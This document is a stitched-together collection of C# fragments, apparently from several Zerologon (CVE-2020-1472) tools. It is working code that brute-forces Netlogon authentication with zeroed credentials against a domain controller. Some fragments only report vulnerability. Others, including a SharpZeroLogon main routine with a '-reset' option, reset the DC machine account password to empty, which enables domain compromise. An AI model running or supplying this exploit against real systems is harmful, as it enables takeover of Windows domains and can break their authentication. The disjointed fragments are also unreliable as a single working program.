protected override string GetCsvData(string computer) { int NegotiateFlags = 0x212fffff; int ServerSecureChannel = 6; int r = 0; for (int i = 0; i < 2000; i++) { var Input = new NETLOGON_CREDENTIAL(); Input.data = new byte[8]; var LazyOutput = new NETLOGON_CREDENTIAL(); LazyOutput.data = new byte[8]; string dcname = computer.Split('.')[0]; r = I_NetServerReqChallenge(computer, dcname, ref Input, out LazyOutput); if (r != 0) { return(computer + "\t" + "Error 1: " + r.ToString("x")); } r = I_NetServerAuthenticate2(computer, dcname + "$", ServerSecureChannel, dcname, ref Input, out LazyOutput, ref NegotiateFlags); if (r == 0) { return(computer + "\t" + "Vulnerable after " + i + " attempts"); } else if ((uint)r != 0xc0000022) { return(computer + "\t" + "Error 3: " + r.ToString("x")); } } return(computer + "\t" + "Error 2: " + r.ToString("x")); }
public static extern int I_NetServerAuthenticate2( string PrimaryName, string AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, string ComputerName, ref NETLOGON_CREDENTIAL ClientCredential, ref NETLOGON_CREDENTIAL ServerCredential, ref ulong NegotiateFlags );
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount) { byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL { data = plaintext }; NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL { data = ciphertext }; NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR { Credential = palintextcred, Timestamp = 0 }; NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR { Credential = chiphertextcred, Timestamp = 0 }; IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth)); Marshal.StructureToPtr(plainAuth, pcred, false); IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth)); Marshal.StructureToPtr(cipherAuth, ccred, false); IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland"); IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount); NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD(); IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass)); Marshal.StructureToPtr(tpass, ptpass, false); NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass); return((NTSTATUS)rpcStatus); }
private static bool Tryzerologonenticate(string targetcomputeraccount) { byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL(); palintextcred.data = plaintext; NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL(); chiphertextcred.data = ciphertext; IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(palintextcred)); Marshal.StructureToPtr(palintextcred, pcred, false); uint flags = 0x212fffff; IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland"); IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount); NTSTATUS rpcStatus = (NTSTATUS)NetrServerReqChallenge(GetStubPtr(), GetProcStringPtr(0), IntPtr.Zero, computernamePtr, pcred, out chiphertextcred); uint rid = 0; try { rpcStatus = (NTSTATUS)NetrServerAuthenticate3(GetStubPtr(), GetProcStringPtr(62), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, out chiphertextcred, out flags, out rid); if (rpcStatus == NTSTATUS.Success) { Console.WriteLine("\n[*]"); return(true); } } catch (Exception e) { if (rpcStatus != NTSTATUS.AccessDenied) { Console.WriteLine("Error: " + e.Message); } } return(false); }
internal static extern int I_NetServerAuthenticate2(string domain, string account, int SecureChannelType, string computername, ref NETLOGON_CREDENTIAL ClientCredential, out NETLOGON_CREDENTIAL ServerCredential, ref int NegotiateFlags);
internal static extern int I_NetServerReqChallenge(string domain, string computer, ref NETLOGON_CREDENTIAL ClientChallenge, out NETLOGON_CREDENTIAL ServerChallenge);
/// <summary> /// /// </summary> /// <param name="args"></param> static void Main(string[] args) { recap(); string Remote_Host = args[0]; while (!Remote_Host.Contains(".")) { Console.WriteLine("[-] Please provide FQDN :"); Remote_Host = Console.ReadLine(); Console.Clear(); } string Remote_HostName = args[0].Split('.')[0]; NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL(); NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL(); ulong NegotiateFlags = 0x212fffff; Console.WriteLine("[+] Begining auth attempts..."); Console.Write("[+] Working... "); Console.CursorVisible = false; int counter = 0; Console.WriteLine("\n\n"); var currConsoleColor = Console.ForegroundColor; for (int i = 0; i < 2000; i++) { counter++; switch (counter % 4) { case 0: Console.Write(" /"); counter = 0; break; case 1: Console.Write(" -"); break; case 2: Console.Write(" \\"); break; case 3: Console.Write(" |"); break; } Console.SetCursorPosition(Console.CursorLeft - 2, Console.CursorTop); if (I_NetServerReqChallenge(Remote_Host, Remote_HostName, ref ClientChallenge, ref ServerChallenge) != 0) { Console.WriteLine("[-] Could not complete server challenge. Could be invalid name provided or network issues\n"); return; } if (I_NetServerAuthenticate2(Remote_Host, Remote_HostName + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, Remote_HostName, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("[+] DC is vulnerable to Zerologon attack.\n"); Console.ForegroundColor = currConsoleColor; return; } } Console.CursorVisible = true; Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("[+] DC appear to not be vulnerable to Zerologon attack.\n"); Console.ForegroundColor = currConsoleColor; }
static void Main(string[] args) { if (args.Length < 1) { Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>"); return; } bool reset = false; bool patch = false; string fqdn = args[0]; string hostname = fqdn.Split('.')[0]; foreach (string arg in args) { switch (arg) { case "-reset": reset = true; break; case "-patch": patch = true; break; } } if (patch) { if (!PatchLogon()) { Console.WriteLine("Patching failed :("); return; } Console.WriteLine("Patch successful. Will use ncacn_ip_tcp"); } NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL(); NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL(); ulong NegotiateFlags = 0x212fffff; Console.WriteLine("Performing authentication attempts..."); for (int i = 0; i < 2000; i++) { if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0) { Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?"); return; } Console.Write("="); if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0) { Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack."); NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR(); NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD(); if (reset) { if (I_NetServerPasswordSet2( fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref authenticator, out _, ref ClearNewPassword ) == 0) { Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0"); return; } Console.WriteLine("Failed to reset machine account password"); } return; } } Console.WriteLine("\nAttack failed. Target is probably patched."); }
public static extern int I_NetServerReqChallenge( string PrimaryName, string ComputerName, ref NETLOGON_CREDENTIAL ClientChallenge, ref NETLOGON_CREDENTIAL ServerChallenge );